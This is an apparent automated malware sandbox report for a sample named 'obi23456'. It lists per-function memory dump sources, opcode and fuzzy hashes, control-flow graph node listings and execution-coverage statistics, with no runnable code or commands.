              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 1dd7b39d9eaeca07019b5fdeae29286ace0ed953a42f9333ed1077a462dcef3c
              • Instruction ID: 72584cf52182ffdca7106a52553cb39da85f032dd0a73a406d07bdefe9dcd19f
              • Opcode Fuzzy Hash: 1dd7b39d9eaeca07019b5fdeae29286ace0ed953a42f9333ed1077a462dcef3c
              • Instruction Fuzzy Hash: 8A31DDB4D102089FCF14DFAAD884AEEFBB4AF89310F20942AE814B7300C734A944CF94
              Function 000CD4CC Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.374158114.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_cd000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6e7921ce533089e12ca59d9a721fbdb8d5a9493f91cfd19cdfcf3a20e5cb2cc6
              • Instruction ID: 86aee268c31ecc8eaa8958d9e43789de3abd2c41d085c047e75c76d2f6ad3295
              • Opcode Fuzzy Hash: 6e7921ce533089e12ca59d9a721fbdb8d5a9493f91cfd19cdfcf3a20e5cb2cc6
              • Instruction Fuzzy Hash: FB21FFB1604240DFEB159F14D8C0F2ABFA5FB98328F30857EE9050A246C336D956DBA1
              Function 001DD01C Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.374174728.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_1dd000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d6952bfe309848a970bd4f8999ab2eb5e88d44f83dc64332abd9fa4d5071fc22
              • Instruction ID: 09496bf6e388b45ceeec83c6096d678e853ef0ade795c6b442a9c55d8df999a7
              • Opcode Fuzzy Hash: d6952bfe309848a970bd4f8999ab2eb5e88d44f83dc64332abd9fa4d5071fc22
              • Instruction Fuzzy Hash: 7921C275604240DFDB14DF24E8C4B16BB65EBC4314F34C5AAE8494B386C33AD847CBA1
              Function 001DD1E8 Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.374174728.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_1dd000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 84b45c1d654f7e6f751364e5fc90c617b24c20e74461288c0436f75ba341e896
              • Instruction ID: 97644fbdcab1c783f3a934ff891c3ef7ec01705b73cd0e92d82d31d9f827d4e4
              • Opcode Fuzzy Hash: 84b45c1d654f7e6f751364e5fc90c617b24c20e74461288c0436f75ba341e896
              • Instruction Fuzzy Hash: 5421C275644240EFDB04DF54E9C4B26FB65EB84714F34C56ED8094B346C33AD846CBA1
              Function 001DD006 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.374174728.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_1dd000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 049bd8d71eeb9d54c4eb6154e2666ad42a1f2352d76110d9ec766dd6e35c2b46
              • Instruction ID: 8abd6a857a10f8cefc4a2196b17f12ee2db7e678570894ab6dbc55f11713c993
              • Opcode Fuzzy Hash: 049bd8d71eeb9d54c4eb6154e2666ad42a1f2352d76110d9ec766dd6e35c2b46
              • Instruction Fuzzy Hash: 7F21A1755093808FDB12CF24D994B15BF71EB86314F28C5EBD8498B697C33AD84ACB62
              Function 000CD4C7 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.374158114.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_cd000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a03215431c7700aa6d9f63b8d2e83db64d9b4d821f1e853ea9c686936a1dca5e
              • Instruction ID: e9f96b6c9702a44b0923c099ea9330a24da0a8294da69416bd479737c8b3aba6
              • Opcode Fuzzy Hash: a03215431c7700aa6d9f63b8d2e83db64d9b4d821f1e853ea9c686936a1dca5e
              • Instruction Fuzzy Hash: DD11B176504640CFDB05CF14D9C4B1ABFA2FB94314F24C6AED8094B256C336D95ACBA2
              Function 001DD1E3 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.374174728.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_1dd000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
              • Instruction ID: e9ec5f779525586d91242a586eb96a4e31b0dc39e051893bf1db1bbd38aa701d
              • Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
              • Instruction Fuzzy Hash: FC11DD75504280CFDB01CF14E5C4B15BFA1FB84314F28C6AAD8094B356C33AD84ACFA2

              Execution Graph

              Execution Coverage:13%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:31.8%
              Total number of Nodes:22
              Total number of Limit Nodes:0
              execution_graph 12009 1c4720 12010 1c472c 12009->12010 12013 1c78c1 12010->12013 12011 1c47e0 12015 1c78f2 12013->12015 12014 1c7cd9 12014->12011 12015->12014 12020 1cfcb8 12015->12020 12024 1cfe53 12015->12024 12028 1cfec5 12015->12028 12032 1cfca9 12015->12032 12022 1cfcdf 12020->12022 12021 1cfe0a LdrInitializeThunk 12023 1cfdfb 12021->12023 12022->12021 12022->12023 12023->12015 12025 1cfd17 12024->12025 12026 1cfdfb 12025->12026 12027 1cfe0a LdrInitializeThunk 12025->12027 12026->12015 12027->12026 12029 1cfd17 12028->12029 12031 1cfdfb 12028->12031 12030 1cfe0a LdrInitializeThunk 12029->12030 12029->12031 12030->12031 12031->12015 12033 1cfcdf 12032->12033 12034 1cfe0a LdrInitializeThunk 12033->12034 12035 1cfdfb 12033->12035 12034->12035 12035->12015

              Executed Functions

              Function 001C5038 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1408 1c5038-1c5058 1409 1c505f-1c524b call 1c0374 * 4 1408->1409 1410 1c505a 1408->1410 1431 1c5aad-1c5ac3 1409->1431 1410->1409 1432 1c5ac9-1c5b07 1431->1432 1433 1c5250-1c5259 1431->1433 1434 1c525b 1433->1434 1435 1c5260-1c527e 1433->1435 1434->1435 1437 1c5284-1c52a6 call 1c2f4c 1435->1437 1438 1c5aa0-1c5aa6 1435->1438 1443 1c5a83-1c5a99 1437->1443 1438->1431 1440 1c5aa8 1438->1440 1440->1431 1445 1c5a9f 1443->1445 1446 1c52ab-1c52b4 1443->1446 1445->1438 1447 1c52bb-1c53da call 1c0374 call 1c0394 * 5 1446->1447 1448 1c52b6 1446->1448 1462 1c53df-1c540c 1447->1462 1448->1447 1463 1c5a46-1c5a65 1462->1463 1464 1c5412-1c541e 1462->1464 1469 1c5a74 1463->1469 1470 1c5a67-1c5a73 1463->1470 1465 1c54be-1c54d4 1464->1465 1467 1c54da-1c55a0 call 1c0394 1465->1467 1468 1c5423-1c542c 1465->1468 1490 1c55a7-1c5602 1467->1490 1491 1c55a2 1467->1491 1471 1c542e 1468->1471 1472 1c5433-1c5464 call 1c0394 1468->1472 1469->1443 1470->1469 1471->1472 1478 1c54a8-1c54b4 1472->1478 1479 1c5466-1c54a7 call 1c0394 1472->1479 1481 1c54bb 1478->1481 1482 1c54b6 1478->1482 1479->1478 1481->1465 1482->1481 1493 1c5609-1c560d 1490->1493 1494 1c5604 1490->1494 1491->1490 1495 1c561d-1c5627 1493->1495 1496 1c560f-1c561b 1493->1496 1494->1493 1498 1c562e-1c564e 1495->1498 1499 1c5629 1495->1499 1497 1c5654-1c56e8 call 1c0394 1496->1497 1506 1c56ee-1c577e 1497->1506 1507 1c5886-1c58ad 1497->1507 1498->1497 1499->1498 1514 1c5785-1c57e0 1506->1514 1515 1c5780 1506->1515 1510 1c58ae-1c5a45 1507->1510 1510->1463 1519 1c57e7-1c57eb 1514->1519 1520 1c57e2 1514->1520 1515->1514 1522 1c57ed-1c57f9 1519->1522 1523 1c57fb-1c5805 1519->1523 1520->1519 1524 1c5832-1c5884 1522->1524 1525 1c580c-1c582c 1523->1525 1526 1c5807 1523->1526 1524->1510 1525->1524 1526->1525
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.897237510.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1c0000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID: &55p
              • API String ID: 0-1955183375
              • Opcode ID: 73cd397884808e61a44bdb779d83ac1850772e6a466106089383530b0805c42a
              • Instruction ID: f18a30f6d78dc1fc359421b5c92caacb11943feaf47966cdb5bcd5713fc43691
              • Opcode Fuzzy Hash: 73cd397884808e61a44bdb779d83ac1850772e6a466106089383530b0805c42a
              • Instruction Fuzzy Hash: 9352BC74A01268CFDB64DF65C884BADBBB2BB99301F5085EAD409A7255DB30AEC1CF50
              Function 001CFCB8 Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1583 1cfcb8-1cfcdd 1584 1cfcdf 1583->1584 1585 1cfce4-1cfd4b 1583->1585 1584->1585 1590 1cfdd5-1cfddb 1585->1590 1591 1cfd50-1cfd63 1590->1591 1592 1cfde1-1cfdf9 1590->1592 1595 1cfd6a-1cfda6 1591->1595 1596 1cfd65 1591->1596 1593 1cfe0a-1cfe2a LdrInitializeThunk 1592->1593 1594 1cfdfb-1cfe08 1592->1594 1597 1cfe2c-1cff07 1593->1597 1594->1597 1605 1cfda8-1cfdb6 1595->1605 1606 1cfdb9-1cfdcb 1595->1606 1596->1595 1600 1cff0f-1cff18 1597->1600 1601 1cff09-1cff0e 1597->1601 1601->1600 1605->1592 1609 1cfdcd 1606->1609 1610 1cfdd2 1606->1610 1609->1610 1610->1590
              APIs
              • LdrInitializeThunk.NTDLL(000000FF), ref: 001CFE1A
              Memory Dump Source
              • Source File: 0000000A.00000002.897237510.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1c0000_obi23456.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: df4ce29918230e1f11d7f882a7125793a0c10a019c63878cbe3e8122f6cd3604
              • Instruction ID: 32b5ac2ef22f7e19c4344194fda4c5242735c68208e9695d89831ada873ed0c3
              • Opcode Fuzzy Hash: df4ce29918230e1f11d7f882a7125793a0c10a019c63878cbe3e8122f6cd3604
              • Instruction Fuzzy Hash: 1351F174D00218DBDB18CFAAD488BDDBBB2BF88310F20812AE415AB294D7749946CF54
              Function 003F5E58 Relevance: .7, Instructions: 745COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1648 3f5e58-3f5e78 1649 3f5e7f-3f5ef7 1648->1649 1650 3f5e7a 1648->1650 1654 3f5ef9-3f5f3f 1649->1654 1655 3f5f44-3f5f96 1649->1655 1650->1649 1662 3f5fdd-3f60c1 1654->1662 1655->1662 1663 3f5f98-3f5fdc 1655->1663 1675 3f60c7-3f61c9 1662->1675 1676 3f6c76-3f6cab 1662->1676 1663->1662 1686 3f6c69-3f6c6f 1675->1686 1687 3f61ce-3f62ab 1686->1687 1688 3f6c75 1686->1688 1696 3f62ad 1687->1696 1697 3f62b2-3f631a 1687->1697 1688->1676 1696->1697 1701 3f631c 1697->1701 1702 3f6321-3f6332 1697->1702 1701->1702 1703 3f63be-3f64c4 1702->1703 1704 3f6338-3f6342 1702->1704 1722 3f64cb-3f6533 1703->1722 1723 3f64c6 1703->1723 1705 3f6349-3f63bd 1704->1705 1706 3f6344 1704->1706 1705->1703 1706->1705 1727 3f653a-3f654b 1722->1727 1728 3f6535 1722->1728 1723->1722 1729 3f65d7-3f678a 1727->1729 1730 3f6551-3f655b 1727->1730 1728->1727 1751 3f678c 1729->1751 1752 3f6791-3f680e 1729->1752 1731 3f655d 1730->1731 1732 3f6562-3f65d6 1730->1732 1731->1732 1732->1729 1751->1752 1756 3f6815-3f6826 1752->1756 1757 3f6810 1752->1757 1758 3f682c-3f6836 1756->1758 1759 3f68b2-3f694b 1756->1759 1757->1756 1760 3f683d-3f68b1 1758->1760 1761 3f6838 1758->1761 1769 3f694d 1759->1769 1770 3f6952-3f69c9 1759->1770 1760->1759 1761->1760 1769->1770 1777 3f69cb 1770->1777 1778 3f69d0-3f69e1 1770->1778 1777->1778 1779 3f6ace-3f6b62 1778->1779 1780 3f69e7-3f6a7b 1778->1780 1789 3f6b68-3f6c53 1779->1789 1790 3f6c54-3f6c5f 1779->1790 1794 3f6a7d 1780->1794 1795 3f6a82-3f6acd 1780->1795 1789->1790 1792 3f6c66 1790->1792 1793 3f6c61 1790->1793 1792->1686 1793->1792 1794->1795 1795->1779
              Memory Dump Source
              • Source File: 0000000A.00000002.897305437.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_3f0000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 20c280a93c7d37a718741c86700b18585672f050c37fbad66a23a079a94e7650
              • Instruction ID: d30f34d13e1112e9c62b9b6ee4a94c04b35b45dcdc43e9dae9d04610b682b42e
              • Opcode Fuzzy Hash: 20c280a93c7d37a718741c86700b18585672f050c37fbad66a23a079a94e7650
              • Instruction Fuzzy Hash: D3827D74E012688FDB64DF69C998BDDBBB2AB89300F5081EAD50DA7365DB305E81CF41
              Function 001C5B18 Relevance: .7, Instructions: 714COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1810 1c5b18-1c5b48 1811 1c5b4f-1c5bd1 1810->1811 1812 1c5b4a 1810->1812 1814 1c5c38-1c5c4e 1811->1814 1812->1811 1815 1c5c50-1c5c9a call 1c0374 1814->1815 1816 1c5bd3-1c5bdc 1814->1816 1827 1c5c9c-1c5cdd call 1c0394 1815->1827 1828 1c5d05-1c5d06 1815->1828 1817 1c5bde 1816->1817 1818 1c5be3-1c5c2e call 1c2864 1816->1818 1817->1818 1825 1c5c35 1818->1825 1826 1c5c30 1818->1826 1825->1814 1826->1825 1834 1c5cff-1c5d00 1827->1834 1835 1c5cdf-1c5cfd 1827->1835 1829 1c5d07-1c5d38 1828->1829 1836 1c5d3f-1c5da6 1829->1836 1837 1c5d01-1c5d03 1834->1837 1835->1837 1842 1c5dac-1c5dcd 1836->1842 1843 1c66f8-1c672f 1836->1843 1837->1829 1846 1c66d5-1c66f1 1842->1846 1847 1c66f7 1846->1847 1848 1c5dd2-1c5ddb 1846->1848 1847->1843 1849 1c5ddd 1848->1849 1850 1c5de2-1c5e48 call 1c2f74 1848->1850 1849->1850 1855 1c5e4f-1c5ed9 call 1c2f84 1850->1855 1856 1c5e4a 1850->1856 1863 1c5eeb-1c5ef2 1855->1863 1864 1c5edb-1c5ee2 1855->1864 1856->1855 1865 1c5ef9-1c5f06 1863->1865 1866 1c5ef4 1863->1866 1867 1c5ee9 1864->1867 1868 1c5ee4 1864->1868 1869 1c5f0d-1c5f14 1865->1869 1870 1c5f08 1865->1870 1866->1865 1867->1865 1868->1867 1871 1c5f1b-1c5f72 1869->1871 1872 1c5f16 1869->1872 1870->1869 1875 1c5f79-1c5f90 1871->1875 1876 1c5f74 1871->1876 1872->1871 1877 1c5f9b-1c5fa3 1875->1877 1878 1c5f92-1c5f99 1875->1878 1876->1875 1879 1c5fa4-1c5fae 1877->1879 1878->1879 1880 1c5fb5-1c5fbe 1879->1880 1881 1c5fb0 1879->1881 1882 1c66a5-1c66ab 1880->1882 1881->1880 1883 1c66b1-1c66cb 1882->1883 1884 1c5fc3-1c5fcf 1882->1884 1890 1c66cd 1883->1890 1891 1c66d2 1883->1891 1885 1c5fd6-1c5fdb 1884->1885 1886 1c5fd1 1884->1886 1888 1c5fdd-1c5fe9 1885->1888 1889 1c601e-1c6020 1885->1889 1886->1885 1893 1c5feb 1888->1893 1894 1c5ff0-1c5ff5 1888->1894 1892 1c6026-1c603a 1889->1892 1890->1891 1891->1846 1896 1c6040-1c6055 1892->1896 1897 1c6683-1c6690 1892->1897 1893->1894 1894->1889 1895 1c5ff7-1c6004 1894->1895 1898 1c600b-1c601c 1895->1898 1899 1c6006 1895->1899 1900 1c605c-1c60e2 1896->1900 1901 1c6057 1896->1901 1902 1c6691-1c669b 1897->1902 1898->1892 1899->1898 1909 1c610c 1900->1909 1910 1c60e4-1c610a 1900->1910 1901->1900 1903 1c669d 1902->1903 1904 1c66a2 1902->1904 1903->1904 1904->1882 1911 1c6116-1c6136 1909->1911 1910->1911 1913 1c613c-1c6146 1911->1913 1914 1c62b5-1c62ba 1911->1914 1915 1c614d-1c6176 1913->1915 1916 1c6148 1913->1916 1917 1c62bc-1c62dc 1914->1917 1918 1c631e-1c6320 1914->1918 1920 1c6178-1c6182 1915->1920 1921 1c6190-1c6192 1915->1921 1916->1915 1931 1c62de-1c6304 1917->1931 1932 1c6306 1917->1932 1919 1c6326-1c6346 1918->1919 1923 1c634c-1c6356 1919->1923 1924 1c667d-1c667e 1919->1924 1926 1c6189-1c618f 1920->1926 1927 1c6184 1920->1927 1922 1c6231-1c6240 1921->1922 1933 1c6247-1c624c 1922->1933 1934 1c6242 1922->1934 1928 1c635d-1c6386 1923->1928 1929 1c6358 1923->1929 1930 1c667f-1c6681 1924->1930 1926->1921 1927->1926 1938 1c6388-1c6392 1928->1938 1939 1c63a0-1c63ae 1928->1939 1929->1928 1930->1902 1935 1c6310-1c631c 1931->1935 1932->1935 1936 1c624e-1c625e 1933->1936 1937 1c6276-1c6278 1933->1937 1934->1933 1935->1919 1940 1c6265-1c6274 1936->1940 1941 1c6260 1936->1941 1942 1c627e-1c6292 1937->1942 1943 1c6399-1c639f 1938->1943 1944 1c6394 1938->1944 1945 1c644d-1c645c 1939->1945 1940->1942 1941->1940 1947 1c6298-1c62b0 1942->1947 1948 1c6197-1c61b2 1942->1948 1943->1939 1944->1943 1949 1c645e 1945->1949 1950 1c6463-1c6468 1945->1950 1947->1930 1951 1c61b9-1c6223 1948->1951 1952 1c61b4 1948->1952 1949->1950 1953 1c646a-1c647a 1950->1953 1954 1c6492-1c6494 1950->1954 1971 1c622a-1c6230 1951->1971 1972 1c6225 1951->1972 1952->1951 1956 1c647c 1953->1956 1957 1c6481-1c6490 1953->1957 1955 1c649a-1c64ae 1954->1955 1958 1c64b4-1c651d 1955->1958 1959 1c63b3-1c63ce 1955->1959 1956->1957 1957->1955 1969 1c651f-1c6521 1958->1969 1970 1c6526-1c6679 1958->1970 1961 1c63d5-1c643f 1959->1961 1962 1c63d0 1959->1962 1976 1c6446-1c644c 1961->1976 1977 1c6441 1961->1977 1962->1961 1973 1c667a-1c667b 1969->1973 1970->1973 1971->1922 1972->1971 1973->1883 1976->1945 1977->1976
              Memory Dump Source
              • Source File: 0000000A.00000002.897237510.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1c0000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 72d95662b478369e1c57646a0880d9f355f14dd0e3789916992a31b5af15b966
              • Instruction ID: 0d1dd8bb860903d634b707109efbb3fc73665318b24caed4eb3b0e3b4ef01652
              • Opcode Fuzzy Hash: 72d95662b478369e1c57646a0880d9f355f14dd0e3789916992a31b5af15b966
              • Instruction Fuzzy Hash: 6F72C174E00228CFDB64DF65C984BEDBBB2BB99301F6485EAD409A7255D730AE81DF40
              Function 001C78C1 Relevance: .3, Instructions: 273COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2406 1c78c1-1c78f0 2407 1c78f7-1c7988 2406->2407 2408 1c78f2 2406->2408 2412 1c798e-1c799e 2407->2412 2413 1c7cda-1c7d0c 2407->2413 2408->2407 2469 1c79a1 call 1c7d30 2412->2469 2470 1c79a1 call 1c8072 2412->2470 2416 1c79a7-1c79b6 2462 1c79b8 call 1cc750 2416->2462 2463 1c79b8 call 1cc740 2416->2463 2464 1c79b8 call 1ccb33 2416->2464 2417 1c79be-1c79da 2419 1c79dc 2417->2419 2420 1c79e1-1c79ea 2417->2420 2419->2420 2421 1c7ccd-1c7cd3 2420->2421 2422 1c79ef-1c79fb 2421->2422 2423 1c7cd9 2421->2423 2465 1c79fd call 1cfcb8 2422->2465 2466 1c79fd call 1cfca9 2422->2466 2467 1c79fd call 1cfec5 2422->2467 2468 1c79fd call 1cfe53 2422->2468 2423->2413 2424 1c7a03-1c7a69 2428 1c7a6f-1c7add call 1c2f94 2424->2428 2429 1c7b25-1c7b80 2424->2429 2440 1c7adf-1c7b1f 2428->2440 2441 1c7b20-1c7b23 2428->2441 2439 1c7b81-1c7bcf 2429->2439 2446 1c7cb8-1c7cc3 2439->2446 2447 1c7bd5-1c7cb7 2439->2447 2440->2441 2441->2439 2449 1c7cca 2446->2449 2450 1c7cc5 2446->2450 2447->2446 2449->2421 2450->2449 2462->2417 2463->2417 2464->2417 2465->2424 2466->2424 2467->2424 2468->2424 2469->2416 2470->2416
              Memory Dump Source
              • Source File: 0000000A.00000002.897237510.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1c0000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d7d597f846ffdf577f0b75e349c4e9d9d6489cceb891a1493e6b4673c3820956
              • Instruction ID: 0af910395252635aefe514d993cb03b938b7e8932fe31bc4a573aae6309642df
              • Opcode Fuzzy Hash: d7d597f846ffdf577f0b75e349c4e9d9d6489cceb891a1493e6b4673c3820956
              • Instruction Fuzzy Hash: 72D1D474E00218CFDB14DFA5C994B9DBBB2BF89301F2084AAD809A7355DB359E85CF50
              Function 001C6740 Relevance: .3, Instructions: 271COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2471 1c6740-1c6770 2472 1c6777-1c6808 2471->2472 2473 1c6772 2471->2473 2477 1c680e-1c685a 2472->2477 2478 1c6b5a-1c6b8c 2472->2478 2473->2472 2484 1c685c 2477->2484 2485 1c6861-1c686a 2477->2485 2484->2485 2486 1c6b4d-1c6b53 2485->2486 2487 1c686f-1c68e9 2486->2487 2488 1c6b59 2486->2488 2493 1c68ef-1c695d call 1c2f94 2487->2493 2494 1c69a5-1c6a00 2487->2494 2488->2478 2504 1c695f-1c699f 2493->2504 2505 1c69a0-1c69a3 2493->2505 2506 1c6a01-1c6a4f 2494->2506 2504->2505 2505->2506 2511 1c6b38-1c6b43 2506->2511 2512 1c6a55-1c6b37 2506->2512 2513 1c6b4a 2511->2513 2514 1c6b45 2511->2514 2512->2511 2513->2486 2514->2513
              Memory Dump Source
              • Source File: 0000000A.00000002.897237510.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1c0000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0209721083cec743683f26a235d01c911b06ed52930888f8d0574d383db8f33c
              • Instruction ID: 0b894df7cf89f7f1e3eebe379c18c1bb3f0a4d349a99696e07c79d4e8369bae8
              • Opcode Fuzzy Hash: 0209721083cec743683f26a235d01c911b06ed52930888f8d0574d383db8f33c
              • Instruction Fuzzy Hash: D9D1D374E00218CFDB14DFA5C984B9DBBB2BF89305F2080AAD809A7365DB349E85CF51
              Function 001C7D30 Relevance: .2, Instructions: 220COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2571 1c7d30-1c7d5b 2572 1c7d5d 2571->2572 2573 1c7d62-1c7df4 2571->2573 2572->2573 2583 1c804a-1c8147 2573->2583 2584 1c7dfa-1c7e33 2573->2584 2588 1c814f-1c8156 2583->2588 2589 1c8149-1c814e 2583->2589 2593 1c7e35-1c7e39 2584->2593 2594 1c7e42-1c7e46 2584->2594 2589->2588 2595 1c7e3b 2593->2595 2596 1c7e40 2593->2596 2597 1c7e4d-1c7ea5 2594->2597 2598 1c7e48 2594->2598 2595->2596 2596->2597 2604 1c7eac-1c7f30 2597->2604 2605 1c7ea7 2597->2605 2598->2597 2612 1c7f37-1c7f3b 2604->2612 2613 1c7f32 2604->2613 2605->2604 2614 1c7f3d 2612->2614 2615 1c7f42-1c7f47 2612->2615 2613->2612 2614->2615 2616 1c7f4e-1c8018 2615->2616 2617 1c7f49 2615->2617 2624 1c801a-1c802d 2616->2624 2625 1c8030-1c8042 call 1c844d 2616->2625 2617->2616 2624->2625 2626 1c8048-1c8049 2625->2626 2626->2583
              Memory Dump Source
              • Source File: 0000000A.00000002.897237510.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1c0000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15cb831fc961a69968a5fd5b670da5f64fd3e82470ee6f645059e7f4a7723b47
              • Instruction ID: cca09191db09abf10b224c7220c759447ef5fa7741e8e04cf1c060321e4e0cc9
              • Opcode Fuzzy Hash: 15cb831fc961a69968a5fd5b670da5f64fd3e82470ee6f645059e7f4a7723b47
              • Instruction Fuzzy Hash: 46A10570D00218CFEB14DFA8C884B9DBBB1FF89304F24966DE409AB291DB749A85CF55
              Function 003FEE10 Relevance: .2, Instructions: 219COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.897305437.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_3f0000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a140cfb8088f055a33c26dcf439cbe88ac43afbef40e629e60738b1d0a57bc61
              • Instruction ID: b0c72478a7a1fd022d1b95baa315ed4258750eba43c67d9338ea43ed96215e43
              • Opcode Fuzzy Hash: a140cfb8088f055a33c26dcf439cbe88ac43afbef40e629e60738b1d0a57bc61
              • Instruction Fuzzy Hash: E3A19175E01228CFEB68CF6AC944B9DBBF2AF89300F14C1AAD50DA7255DB305A85CF51
              Function 003FF460 Relevance: .2, Instructions: 219COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.897305437.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_3f0000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 074cecc82c31cb4b540c6471c22284694f5985c215afdbfee2b6c0e468e23f83
              • Instruction ID: 3817fa688712be095ea1683b213fb2b81a583f86d19ce64dec8382d624144fcc
              • Opcode Fuzzy Hash: 074cecc82c31cb4b540c6471c22284694f5985c215afdbfee2b6c0e468e23f83
              • Instruction Fuzzy Hash: 75A1A271E012288FEB68DF6AC944B9DFBF2AF89300F14C1AAD50CA7255DB345A85CF51
              Function 003FD4E0 Relevance: .2, Instructions: 219COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2629 3fd4e0-3fd501 2630 3fd508-3fd66a 2629->2630 2631 3fd503 2629->2631 2635 3fd66c-3fd66d 2630->2635 2636 3fd672-3fd685 2630->2636 2631->2630 2637 3fdb0c-3fdb13 2635->2637 2638 3fd744-3fd75d 2636->2638 2639 3fd68a-3fd696 2638->2639 2640 3fd763-3fd76d 2638->2640 2641 3fd69d-3fd6e1 2639->2641 2642 3fd698 2639->2642 2643 3fdad4-3fdb0b 2640->2643 2644 3fd773-3fd830 2640->2644 2648 3fd70b-3fd716 2641->2648 2649 3fd6e3-3fd6ed 2641->2649 2642->2641 2643->2637 2663 3fd83f 2644->2663 2664 3fd832-3fd83e 2644->2664 2653 3fd72e-3fd73a 2648->2653 2654 3fd718-3fd72c 2648->2654 2650 3fd6ef 2649->2650 2651 3fd6f4-3fd70a 2649->2651 2650->2651 2651->2648 2655 3fd73c 2653->2655 2656 3fd741 2653->2656 2654->2640 2655->2656 2656->2638 2663->2643 2664->2663
              Memory Dump Source
